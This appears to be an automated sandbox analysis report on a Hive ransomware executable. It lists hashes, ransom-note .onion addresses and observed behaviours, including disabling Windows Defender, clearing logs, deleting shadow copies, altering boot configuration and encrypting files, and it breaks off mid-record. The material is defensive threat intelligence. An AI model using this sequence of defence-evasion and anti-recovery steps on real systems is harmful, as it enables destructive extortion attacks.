Analysis
-
max time kernel
182s -
max time network
124s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 19:26
Static task
static1
Behavioral task
behavioral1
Sample
c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe
Resource
win10-en-20211208
General
-
Target
c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe
-
Size
2.6MB
-
MD5
e83823a144ac36854d9c007508c07e0a
-
SHA1
4a9fa6364b55f85dca3ab6862a2fd73b67191098
-
SHA256
c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15
-
SHA512
6bc9e7f553991c1a17eb842f00d4f6562f7a2b6df41d5fc8818aae02258b09f23d180a30b3b036e0161b1f810cfb3683b95d22c90d7552ada0444478af430d07
Malware Config
Extracted
C:\Program Files\7-Zip\vyS2_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1272 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1920 bcdedit.exe 620 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exedescription ioc process File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_-QdHfhJgdIo0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYER98.POC.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_IP1QxnAExbA0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\css\cpu.css c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215076.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_nYvWBHUVz2k0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_AktY0Fb8tj40.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_x8wScbWpV0A0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\STRTEDGE.INF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_q7mDP58Ue640.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099201.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_ppJWokR7gNc0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\vyS2_HOW_TO_DECRYPT.txt c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_9znLbMUVkOw0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099184.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_L0jB_2BzHVE0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105368.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_CsxtEScqIOc0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_OLHdCQs6qlM0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_5oAyYdFdhGs0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\settings.css c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_zcaawo9I91I0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_t8ybF_woHpI0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\TOC98.POC.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_dpTWGEB2zlo0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_HguxSk5_qJQ0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_eAoPrwCmf6M0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_disable.gif.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1NUNv85SfKE0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_H9Sw2I-NhPQ0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Windows Sidebar\ja-JP\sbdrop.dll.mui c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_aHyk0Cx-EoY0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_down.png c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00555_.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_Rz7rbldeanM0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Solstice.thmx.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_7VYzzCb49Bc0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\vyS2_HOW_TO_DECRYPT.txt c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_r1JsYqjHkfQ0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_GreenTea.gif.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_fyyKrIIjZhw0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSTH7FR.LEX.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1S0DkVNFyJE0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\PAWPRINT.HTM.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_dG0Y2VLVPZU0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\vyS2_HOW_TO_DECRYPT.txt c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_gNJm2LdGyeE0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1tc5K1JFgj00.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_MfOITshG0C40.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_4qfVfFrBGDc0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_EKm8KedZVac0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_xvsftD7L4eE0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_59CfPhvU4gc0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01743_.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_LFS10E66NZI0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_RQmmA2AZqb40.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1LEJ-ivifeA0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\3.png c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_S6nEgIoxBnA0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_i6rkMkgC6hE0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_POsspnLpQio0.8zvpm c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 540 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2532 notepad.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exec81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exepid process 1868 powershell.exe 2136 powershell.exe 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1760 wevtutil.exe Token: SeBackupPrivilege 1760 wevtutil.exe Token: SeSecurityPrivilege 1060 wevtutil.exe Token: SeBackupPrivilege 1060 wevtutil.exe Token: SeSecurityPrivilege 1928 wevtutil.exe Token: SeBackupPrivilege 1928 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1748 wmic.exe Token: SeSecurityPrivilege 1748 wmic.exe Token: SeTakeOwnershipPrivilege 1748 wmic.exe Token: SeLoadDriverPrivilege 1748 wmic.exe Token: SeSystemProfilePrivilege 1748 wmic.exe Token: SeSystemtimePrivilege 1748 wmic.exe Token: SeProfSingleProcessPrivilege 1748 wmic.exe Token: SeIncBasePriorityPrivilege 1748 wmic.exe Token: SeCreatePagefilePrivilege 1748 wmic.exe Token: SeBackupPrivilege 1748 wmic.exe Token: SeRestorePrivilege 1748 wmic.exe Token: SeShutdownPrivilege 1748 wmic.exe Token: SeDebugPrivilege 1748 wmic.exe Token: SeSystemEnvironmentPrivilege 1748 wmic.exe Token: SeRemoteShutdownPrivilege 1748 wmic.exe Token: SeUndockPrivilege 1748 wmic.exe Token: SeManageVolumePrivilege 1748 wmic.exe Token: 33 1748 wmic.exe Token: 34 1748 wmic.exe Token: 35 1748 wmic.exe Token: SeIncreaseQuotaPrivilege 812 wmic.exe Token: SeSecurityPrivilege 812 wmic.exe Token: SeTakeOwnershipPrivilege 812 wmic.exe Token: SeLoadDriverPrivilege 812 wmic.exe Token: SeSystemProfilePrivilege 812 wmic.exe Token: SeSystemtimePrivilege 812 wmic.exe Token: SeProfSingleProcessPrivilege 812 wmic.exe Token: SeIncBasePriorityPrivilege 812 wmic.exe Token: SeCreatePagefilePrivilege 812 wmic.exe Token: SeBackupPrivilege 812 wmic.exe Token: SeRestorePrivilege 812 wmic.exe Token: SeShutdownPrivilege 812 wmic.exe Token: SeDebugPrivilege 812 wmic.exe Token: SeSystemEnvironmentPrivilege 812 wmic.exe Token: SeRemoteShutdownPrivilege 812 wmic.exe Token: SeUndockPrivilege 812 wmic.exe Token: SeManageVolumePrivilege 812 wmic.exe Token: 33 812 wmic.exe Token: 34 812 wmic.exe Token: 35 812 wmic.exe Token: SeIncreaseQuotaPrivilege 812 wmic.exe Token: SeSecurityPrivilege 812 wmic.exe Token: SeTakeOwnershipPrivilege 812 wmic.exe Token: SeLoadDriverPrivilege 812 wmic.exe Token: SeSystemProfilePrivilege 812 wmic.exe Token: SeSystemtimePrivilege 812 wmic.exe Token: SeProfSingleProcessPrivilege 812 wmic.exe Token: SeIncBasePriorityPrivilege 812 wmic.exe Token: SeCreatePagefilePrivilege 812 wmic.exe Token: SeBackupPrivilege 812 wmic.exe Token: SeRestorePrivilege 812 wmic.exe Token: SeShutdownPrivilege 812 wmic.exe Token: SeDebugPrivilege 812 wmic.exe Token: SeSystemEnvironmentPrivilege 812 wmic.exe Token: SeRemoteShutdownPrivilege 812 wmic.exe Token: SeUndockPrivilege 812 wmic.exe Token: SeManageVolumePrivilege 812 wmic.exe Token: 33 812 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 844 wrote to memory of 1452 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 1452 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 1452 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 1452 wrote to memory of 760 1452 net.exe net1.exe PID 1452 wrote to memory of 760 1452 net.exe net1.exe PID 1452 wrote to memory of 760 1452 net.exe net1.exe PID 844 wrote to memory of 428 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 428 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 428 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 428 wrote to memory of 1060 428 net.exe net1.exe PID 428 wrote to memory of 1060 428 net.exe net1.exe PID 428 wrote to memory of 1060 428 net.exe net1.exe PID 844 wrote to memory of 592 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 592 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 592 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 592 wrote to memory of 1596 592 net.exe net1.exe PID 592 wrote to memory of 1596 592 net.exe net1.exe PID 592 wrote to memory of 1596 592 net.exe net1.exe PID 844 wrote to memory of 1836 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 1836 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 1836 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 1836 wrote to memory of 432 1836 net.exe net1.exe PID 1836 wrote to memory of 432 1836 net.exe net1.exe PID 1836 wrote to memory of 432 1836 net.exe net1.exe PID 844 wrote to memory of 1804 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 1804 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 1804 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 1804 wrote to memory of 1876 1804 net.exe net1.exe PID 1804 wrote to memory of 1876 1804 net.exe net1.exe PID 1804 wrote to memory of 1876 1804 net.exe net1.exe PID 844 wrote to memory of 1040 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 1040 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 1040 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 1040 wrote to memory of 1504 1040 net.exe net1.exe PID 1040 wrote to memory of 1504 1040 net.exe net1.exe PID 1040 wrote to memory of 1504 1040 net.exe net1.exe PID 844 wrote to memory of 1568 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 1568 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 1568 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 1568 wrote to memory of 952 1568 net.exe net1.exe PID 1568 wrote to memory of 952 1568 net.exe net1.exe PID 1568 wrote to memory of 952 1568 net.exe net1.exe PID 844 wrote to memory of 1776 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 1776 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 844 wrote to memory of 1776 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe net.exe PID 1776 wrote to memory of 1624 1776 net.exe net1.exe PID 1776 wrote to memory of 1624 1776 net.exe net1.exe PID 1776 wrote to memory of 1624 1776 net.exe net1.exe PID 844 wrote to memory of 968 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 968 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 968 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 1288 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 1288 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote to memory of 1288 844 c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe sc.exe PID 844 wrote 